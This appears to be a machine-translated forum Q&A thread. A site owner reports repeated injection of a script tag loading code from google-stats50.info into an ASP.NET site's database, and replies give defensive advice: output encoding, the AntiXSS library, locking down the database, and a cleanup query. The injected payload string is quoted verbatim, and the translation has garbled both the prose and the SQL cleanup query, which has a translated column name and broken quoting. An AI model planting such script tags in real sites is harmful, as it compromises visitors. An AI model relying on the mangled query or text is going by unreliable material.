2010-09-23 140 views
5

我遇到了很大的麻煩。請幫忙!!!!!!!!!!XSS攻擊ASP.NET網站

我的網站遭到了一些惡意腳本的攻擊</title> < script src = http:// google-stats50.info/ur.php>。該腳本會自動附加到某個表的任何列。我已經刪除了這個腳本。但幾個小時後,它重新出現在一些表格中。但是這次是</title> <腳本src = http:// google-stats49.info/ur.php>。

我的客戶抱怨腳本。使用的技術是ASP.NET 1.1,SQL SERVER 2005.

請幫忙。

在此先感謝!!!!!!

回答

2

關閉該網站。您的服務器現在可能已經或可能不會被擰緊。

你必須找出變化的來源 - 數據庫或文件系統

如果它的數據庫,那麼你可能是好的,有人可能使用SQL注入。設置權限,以便現在無法由站點更新數據庫,直到找到SQL INJECTION點。

如果它是您的文件系統,那麼您可能需要清除並重置網站。他們在,你不會擺脫他們。找到你的切入點,但它會很難。

+1

另外,儘量消毒(不允許HTML/JS)用戶輸入。 – sheeks06 2010-09-23 06:52:17

+0

我們通過腳本技術加載第三方網站上的內容...這就是我的網站的目的....是否有辦法儘快解決它 – user423719 2010-09-23 07:10:29

+0

現在可能太晚了,但如果像這樣的事情發生並且很快,通常需要聘請專家。一位非常昂貴的專家。 – Dann 2010-10-06 12:30:28

4

當您從數據庫渲染文本時,可以使用兩種方法來避免此腳本。

  1. 用戶Server.HtmlEncode(DataFromDatabase);
  2. 使用具有相似功能的 Microsoft Anti-Cross dll library具有更多選項。

Last MS Anti-XSS library now是3.1。
How to using video

他們是如何通過這個腳本的。

  1. 在聯繫方式或其他形式。
  2. 在瀏覽器對統計信息的引用以及他們瀏覽您的網站時,您會記錄此信息,並且在您看到此日誌時腳本正在運行。

希望得到這個幫助。

+0

好的..謝謝.....我會在我的應用程序中實施這些預防措施。但是有沒有快速解決方案來刪除腳本? – user423719 2010-09-23 07:49:51

+0

我不知道他們是如何傳遞這個腳本並將它注入數據庫的。 – user423719 2010-09-23 07:53:08

+0

@ user423719我在回答中鍵入了2種可能的方式,從聯繫表單或您登錄的瀏覽器數據注入。不要刪除腳本,只是讓它不能運行,然後找到如何輸入,如果你喜歡,你可以制定更多的措施。 – Aristos 2010-09-23 08:05:58

0

我建議您在IIS中刪除所有extern hostheader綁定。這使您可以在本地查找問題,沒有任何客戶端的你可能感染/從

0

的快速補救

繼被盜是不是一個解決方案,但有了這個,你可以在從數據庫中刪除腳本單個查詢。那就是我現在所做的:)。


UPDATE TABLE_NAME SET COLUMN_NAME = REPLACE(CAST(列名AS爲nvarchar(MAX)),「http://google-stats49.info/ur。'>')


這一個工作就像查找和替換字中的東西。如果您發現任何關於病毒腳本的東西,請在此處發佈。

問候, 馬蘇德

+0

嗨,大家好,有另一個注入鏈接。看起來這個是由同一個機器人注入的。不能發佈鏈接在這裏。book 2010-09-25 07:19:41

+0

它再次出現。我已經在Web.config文件中加密了敏感信息。我認爲它停止了腳本重新出現大約24小時。但它又一次出現了。請幫忙。 – user423719 2010-09-29 07:14:04